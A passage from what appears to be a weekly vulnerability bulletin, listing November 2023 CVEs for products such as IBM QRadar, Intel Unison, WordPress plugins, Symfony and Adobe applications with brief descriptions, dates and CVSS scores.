ibm — qradar_security_information_and_event_manager IBM QRadar SIEM 7.5.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 267484. 2023-11-11 5.4 CVE-2023-43057
 
icssolution — ics_business_manager An XSS vulnerability has been discovered in ICS Business Manager affecting version 7.06.0028.7066. A remote attacker could send a specially crafted string exploiting the obdd_act parameter, allowing the attacker to steal an authenticated user’s session, and perform actions within the application. 2023-11-13 6.1 CVE-2023-6098
intel(r) — unison_software Uncaught exception for some Intel Unison software may allow an authenticated user to potentially enable denial of service via network access. 2023-11-14 6.5 CVE-2023-22290
intel(r) — unison_software Improper input validationation for some Intel Unison software may allow an authenticated user to potentially enable denial of service via network access. 2023-11-14 6.5 CVE-2023-38131
intel(r) — unison_software Incomplete cleanup for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access. 2023-11-14 5.5 CVE-2022-43477
intel(r) — unison_software Exposure of sensitive system information due to uncleared debug information for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access. 2023-11-14 5.5 CVE-2022-43666
intel(r) — unison_software Improper initialization for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access. 2023-11-14 5.5 CVE-2022-45109
intel(r) — unison_software Insufficient control flow management for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access. 2023-11-14 5.5 CVE-2022-46299
intel(r) — unison_software Exposure of sensitive information to an unauthorized actor for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access. 2023-11-14 5.5 CVE-2022-46646
intel(r) — unison_software Insertion of sensitive information into log file for some Intel Unison software may allow an authenticated user to potentially enable information disclosure via local access. 2023-11-14 5.5 CVE-2022-46647
intel(r) — unison_software Incomplete cleanup for some Intel Unison software may allow a privileged user to potentially enable denial of service via local access. 2023-11-14 4.4 CVE-2022-46298
intel(r) — unison_software Improper Initialization for some Intel Unison software may allow a privileged user to potentially enable denial of service via local access. 2023-11-14 4.4 CVE-2022-46301
intel(r) — unison_software Improper input validation for some Intel Unison software may allow a privileged user to potentially enable denial of service via local access. 2023-11-14 4.4 CVE-2023-39411
lionscripts — webmaster_tools Cross-Site Request Forgery (CSRF) vulnerability in LionScripts.Com Webmaster Tools allows Stored XSS.This issue affects Webmaster Tools: from n/a through 2.0. 2023-11-13 6.1 CVE-2023-46092
microsoft — edge_chromium Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability 2023-11-10 6.3 CVE-2023-36027
netgate — pfsense Cross Site Scripting (XSS) vulnerability in Netgate pfSense v.2.7.0 allows a remote attacker to gain privileges via a crafted url to the status_logs_filter_dynamic.php page. 2023-11-14 5.4 CVE-2023-42325
netgate — pfsense Cross Site Scripting (XSS) vulnerability in Netgate pfSense v.2.7.0 allows a remote attacker to gain privileges via a crafted URL to the getserviceproviders.php page. 2023-11-14 5.4 CVE-2023-42327
optimizely_cms — optimizely_cms Optimizely CMS UI before v12.16.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Admin panel. 2023-11-14 4.8 CVE-2023-31754
phpgurukul — restaurant_table_booking_system A vulnerability classified as problematic has been found in PHPGurukul Restaurant Table Booking System 1.0. Affected is an unknown function of the file index.php of the component Reservation Request Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-244944. 2023-11-10 6.1 CVE-2023-6075
 
phpgurukul — teacher_subject_allocation_management_system SQL Injection vulnerability in teacher-info.php in phpgurukul Teacher Subject Allocation Management System 1.0 allows attackers to obtain sensitive information via the ‘editid’ parameter. 2023-11-14 4.9 CVE-2023-46025
phpgurukul — teacher_subject_allocation_management_system Cross Site Scripting (XSS) vulnerability in profile.php in phpgurukul Teacher Subject Allocation Management System 1.0 allows attackers to run arbitrary code via the ‘adminname’ and ’email’ parameters. 2023-11-14 4.8 CVE-2023-46026
powr — powr The POWR plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘powr-powr-pack’ shortcode in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-13 5.4 CVE-2023-5741

 

salesagility — suitecrm Unrestricted Upload of File with Dangerous Type in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2. 2023-11-14 5.4 CVE-2023-6127
 
salesagility — suitecrm Cross-site Scripting (XSS) – Reflected in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2. 2023-11-14 5.4 CVE-2023-6128
 
salesagility — suitecrm Server-Side Request Forgery (SSRF) in GitHub repository salesagility/suitecrm prior to 7.14.2, 8.4.2, 7.12.14. 2023-11-14 4.3 CVE-2023-6124
 
sensiolabs — symfony Symfony is a PHP framework for web and console applications and a set of reusable PHP components. Starting in versions 5.4.21 and 6.2.7 and prior to versions 5.4.31 and 6.3.8, `SessionStrategyListener` does not migrate the session after every successful login. It does so only in case the logged in user changes by means of checking the user identifier. In some use cases, the user identifier doesn’t change between the verification phase and the successful login, while the token itself changes from one type (partially authenticated) to another (fully authenticated). When this happens, the session id should be regenerated to prevent possible session fixations, which is not the case at the moment. As of versions 5.4.31 and 6.3.8, Symfony now checks the type of the token in addition to the user identifier before deciding whether the session id should be regenerated. 2023-11-10 6.5 CVE-2023-46733

 

sensiolabs — symfony Symfony is a PHP framework for web and console applications and a set of reusable PHP components. Starting in versions 2.0.0, 5.0.0, and 6.0.0 and prior to versions 4.4.51, 5.4.31, and 6.3.8, some Twig filters in CodeExtension use `is_safe=html` but don’t actually ensure their input is safe. As of versions 4.4.51, 5.4.31, and 6.3.8, Symfony now escapes the output of the affected filters. 2023-11-10 6.1 CVE-2023-46734

 

sensiolabs — symfony Symfony is a PHP framework for web and console applications and a set of reusable PHP components. Starting in version 6.0.0 and prior to version 6.3.8, the error message in `WebhookController` returns unescaped user-submitted input. As of version 6.3.8, `WebhookController` now doesn’t return any user-submitted input in its response. 2023-11-10 6.1 CVE-2023-46735
 
sentry — sentry_software_development_kit sentry-javascript provides Sentry SDKs for JavaScript. An unsanitized input of Next.js SDK tunnel endpoint allows sending HTTP requests to arbitrary URLs and reflecting the response back to the user. This issue only affects users who have Next.js SDK tunneling feature enabled. The problem has been fixed in version 7.77.0. 2023-11-10 6.1 CVE-2023-46729

 

siemens — comos A vulnerability has been identified in COMOS (All versions). The affected application lacks proper access controls in SMB shares. This could allow an attacker to access files that the user should not have access to. 2023-11-14 6.5 CVE-2023-43505
sigstore — gitsign Gitsign is software for keyless Git signing using Sigstore. In versions of gitsign starting with 0.6.0 and prior to 0.8.0, Rekor public keys were fetched via the Rekor API, instead of through the local TUF client. If the upstream Rekor server happened to be compromised, gitsign clients could potentially be tricked into trusting incorrect signatures. There is no known compromise the default public good instance (`rekor.sigstore.dev`) – anyone using this instance is unaffected. This issue was fixed in v0.8.0. No known workarounds are available. 2023-11-10 5.3 CVE-2023-47122

 

volkswagen — id.3_firmware Attacker can perform a Denial-of-Service attack to crash the ICAS 3 IVI ECU in a Volkswagen ID.3 (and other vehicles of the VW Group with the same hardware) and spoof volume setting commands to irreversibly turn on audio volume to maximum via REST API calls. 2023-11-10 6.3 CVE-2023-6073
wordpress — wordpress Server-Side Request Forgery (SSRF) vulnerability in Blubrry PowerPress Podcasting plugin by Blubrry.This issue affects PowerPress Podcasting plugin by Blubrry: from n/a through 11.0.6. 2023-11-13 6.5 CVE-2023-41239
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Haoqisir Baidu Tongji generator allows Stored XSS. This issue affects Baidu Tongji generator: from n/a through 1.0.2. 2023-11-13 6.1 CVE-2023-31230
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Dream-Theme The7 allows Stored XSS. This issue affects The7: from n/a through 11.7.3. 2023-11-13 6.1 CVE-2023-32123
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Vadym K. Extra User Details allows Stored XSS. This issue affects Extra User Details: from n/a through 0.5. 2023-11-13 6.1 CVE-2023-35877
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in tagDiv tagDiv Composer allows Cross-Site Scripting (XSS). This issue affects tagDiv Composer: from n/a before 4.4. 2023-11-13 6.1 CVE-2023-39166
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Jeremy O’Connell Cleverwise Daily Quotes allows Stored XSS. This issue affects Cleverwise Daily Quotes: from n/a through 3.2. 2023-11-13 6.1 CVE-2023-40335
wordpress — wordpress The Star CloudPRNT for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘printersettings’ parameter in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. 2023-11-13 6.1 CVE-2023-4603

 

wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in phoeniixx Custom My Account for Woocommerce allows Cross-Site Scripting (XSS). This issue affects Custom My Account for Woocommerce: from n/a through 2.1. 2023-11-13 6.1 CVE-2023-46634
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Stark Digital Category Post List Widget allows Stored XSS. This issue affects Category Post List Widget: from n/a through 2.0. 2023-11-13 6.1 CVE-2023-47516
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in RedNao Donations Made Easy – Smart Donations allows Stored XSS. This issue affects Donations Made Easy – Smart Donations: from n/a through 4.0.12. 2023-11-14 6.1 CVE-2023-47550
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Lucian Apostol Auto Affiliate Links allows Stored XSS.This issue affects Auto Affiliate Links: from n/a through 6.4.2.4. 2023-11-13 6.1 CVE-2023-47652
wordpress — wordpress Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in edward_plainview Plainview Protect Passwords plugin <= 1.4 versions. 2023-11-14 6.1 CVE-2023-47665
wordpress — wordpress Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in ThemePunch OHG Essential Grid plugin <= 3.1.0 versions. 2023-11-14 6.1 CVE-2023-47684
wordpress — wordpress Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Anton Bond Additional Order Filters for WooCommerce plugin <= 1.10 versions. 2023-11-13 6.1 CVE-2023-47690
wordpress — wordpress Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Scribit Shortcodes Finder plugin <= 1.5.3 versions. 2023-11-13 6.1 CVE-2023-47695
wordpress — wordpress Unauth. Stored Cross-Site Scripting (XSS) vulnerability in Gravity Master Product Enquiry for WooCommerce plugin <= 3.0 versions. 2023-11-13 6.1 CVE-2023-47696
wordpress — wordpress Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WP Event Manager WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce plugin <= 3.1.39 versions. 2023-11-13 6.1 CVE-2023-47697
wordpress — wordpress Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in livescore.Bz BZScore – Live Score plugin <= 1.03 versions. 2023-11-14 5.4 CVE-2023-47654
wordpress — wordpress Auth. (editor+) Stored Cross-Site Scripting (XSS) vulnerability in Marco Milesi ANAC XML Bandi di Gara plugin <= 7.5 versions. 2023-11-14 5.4 CVE-2023-47656
wordpress — wordpress Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Qode Interactive Qi Addons For Elementor plugin <= 1.6.3 versions. 2023-11-14 5.4 CVE-2023-47680
wordpress — wordpress The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘advanced_iframe’ shortcode in versions up to, and including, 2023.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-11-13 5.4 CVE-2023-4775

 

wordpress — wordpress Server-Side Request Forgery (SSRF) vulnerability in WPChill Download Monitor. This issue affects Download Monitor: from n/a through 4.8.1. 2023-11-13 4.9 CVE-2023-31219
wordpress — wordpress Server-Side Request Forgery (SSRF) vulnerability in Dimitar Ivanov HTTP Headers. This issue affects HTTP Headers: from n/a through 1.18.11. 2023-11-13 4.9 CVE-2023-37978
wordpress — wordpress Server-Side Request Forgery (SSRF) vulnerability in Andy Moyle Church Admin. This issue affects Church Admin: from n/a through 3.7.56. 2023-11-13 4.9 CVE-2023-38515
wordpress — wordpress Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in wpdevart Countdown and CountUp, WooCommerce Sales Timer plugin <= 1.8.2 versions. 2023-11-14 4.8 CVE-2023-47533
wordpress — wordpress Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in DenK BV Actueel Financieel Nieuws – Denk Internet Solutions plugin <= 5.1.0 versions. 2023-11-14 4.8 CVE-2023-47554
wordpress — wordpress Auth. (Shop Manager+) Stored Cross-Site Scripting (XSS) vulnerability in CedCommerce Recently viewed and most viewed products plugin <= 1.1.1 versions. 2023-11-14 4.8 CVE-2023-47646
wordpress — wordpress Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Abu Bakar TWB Woocommerce Reviews plugin <= 1.7.5 versions. 2023-11-14 4.8 CVE-2023-47653
wordpress — wordpress Auth. (ShopManager+) Stored Cross-Site Scripting (XSS) vulnerability in actpro Extra Product Options for WooCommerce plugin <= 3.0.3 versions. 2023-11-14 4.8 CVE-2023-47658
wpgraphql — wpgraphql Server-Side Request Forgery (SSRF) vulnerability in WPGraphQL. This issue affects WPGraphQL: from n/a through 1.14.5. 2023-11-13 6.5 CVE-2023-23684

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
discourse — discourse Discourse is an open source platform for community discussion. Prior to version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, there is an edge case where a bookmark reminder is sent and an unread notification is generated, but the underlying bookmarkable (e.g. post, topic, chat message) security has changed, making it so the user can no longer access the underlying resource. As of version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, bookmark reminders are now no longer sent if the user does not have access to the underlying bookmarkable, and also the unread bookmark notifications are always filtered by access. There are no known workarounds. 2023-11-10 3.3 CVE-2023-45816

 

fortinet — fortisiem An insertion of sensitive information into log file vulnerability [CWE-532] in FortiSIEM version 7.0.0, version 6.7.6 and below, version 6.6.3 and below, version 6.5.1 and below, version 6.4.2 and below, version 6.3.3 and below, version 6.2.1 and below, version 6.1.2 and below, version 5.4.0, version 5.3.3 and below may allow an authenticated user to view an encrypted ElasticSearch password via debug log files generated when FortiSIEM is configured with ElasticSearch Event Storage. 2023-11-14 3.3 CVE-2023-45585
telit — bgs5_firmware A CWE-200: Exposure of Sensitive Information to an Unauthorized Actor vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to disclose hidden virtual paths and file names on the targeted system. 2023-11-10 3.3 CVE-2023-47614

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
adobe — robohelp_server Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability that could lead to information disclosure by a low-privileged authenticated attacker. Exploitation of this issue does not require user interaction. 2023-11-17 not yet calculated CVE-2023-22268
adobe — robohelp_server Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Input Validation vulnerability that could lead to information disclosure by an unauthenticated attacker. Exploitation of this issue does not require user interaction. 2023-11-17 not yet calculated CVE-2023-22272
adobe — robohelp_server Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could lead to Remote Code Execution by an admin authenticated attacker. Exploitation of this issue does not require user interaction. 2023-11-17 not yet calculated CVE-2023-22273
adobe — robohelp_server Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Restriction of XML External Entity Reference (‘XXE’) vulnerability that could lead to information disclosure by an unauthenticated attacker. Exploitation of this issue does not require user interaction. 2023-11-17 not yet calculated CVE-2023-22274
adobe — robohelp_server Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability that could lead to information disclosure by an unauthenticated attacker. Exploitation of this issue does not require user interaction. 2023-11-17 not yet calculated CVE-2023-22275
abbott — id_now In Abbott ID NOW before 7.1, settings can be modified via physical access to an internal serial port. 2023-11-14 not yet calculated CVE-2023-47262
 
adobe — acrobat_reader Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44336
adobe — acrobat_reader Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44337
adobe — acrobat_reader Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44338
adobe — acrobat_reader Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44339
adobe — acrobat_reader Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44340
adobe — acrobat_reader Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44348
adobe — acrobat_reader Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44356
adobe — acrobat_reader Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44357
adobe — acrobat_reader Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44358
adobe — acrobat_reader Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44359
adobe — acrobat_reader Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44360
adobe — acrobat_reader Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44365
adobe — acrobat_reader Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44366
adobe — acrobat_reader Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44367
adobe — acrobat_reader Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44371
adobe — acrobat_reader Adobe Acrobat Reader versions 23.006.20360 (and earlier) and 20.005.30524 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44372
adobe — after_effects Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-17 not yet calculated CVE-2023-47066
adobe — after_effects Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-17 not yet calculated CVE-2023-47067
adobe — after_effects Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-17 not yet calculated CVE-2023-47068
adobe — after_effects Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-17 not yet calculated CVE-2023-47069
adobe — after_effects Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-17 not yet calculated CVE-2023-47070
adobe — after_effects Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-17 not yet calculated CVE-2023-47071
adobe — after_effects Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-17 not yet calculated CVE-2023-47072
adobe — after_effects Adobe After Effects version 24.0.2 (and earlier) and 23.6 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-17 not yet calculated CVE-2023-47073
adobe — animate Adobe Animate versions 23.0.2 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-17 not yet calculated CVE-2023-44325
adobe — audition Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47046
adobe — audition Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47047
adobe — audition Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47048
adobe — audition Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47049
adobe — audition Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47050
adobe — audition Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47051
adobe — audition Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47052
adobe — audition Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47053
adobe — audition Adobe Audition version 24.0 (and earlier) and 23.6.1 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-47054
adobe — bridge Adobe Bridge versions 13.0.4 (and earlier) and 14.0.0 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44327
adobe — bridge Adobe Bridge versions 13.0.4 (and earlier) and 14.0.0 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44328
adobe — bridge Adobe Bridge versions 13.0.4 (and earlier) and 14.0.0 (and earlier) are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-11-16 not yet calculated CVE-2023-44329
adobe — coldfusion Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An unauthenticated attacker could leverage this vulnerability to access the administration CFM and CFC endpoints. Exploitation of this issue does not require user interaction. 2023-11-17 not yet calculated CVE-2023-26347
adobe — coldfusion Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction. 2023-11-17 not yet calculated CVE-2023-44350
adobe — coldfusion Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction. 2023-11-17 not yet calculated CVE-2023-44351
adobe — coldfusion Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-11-17 not yet calculated CVE-2023-44352
adobe — coldfusion Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction. 2023-11-17 not yet calculated CVE-2023-44353
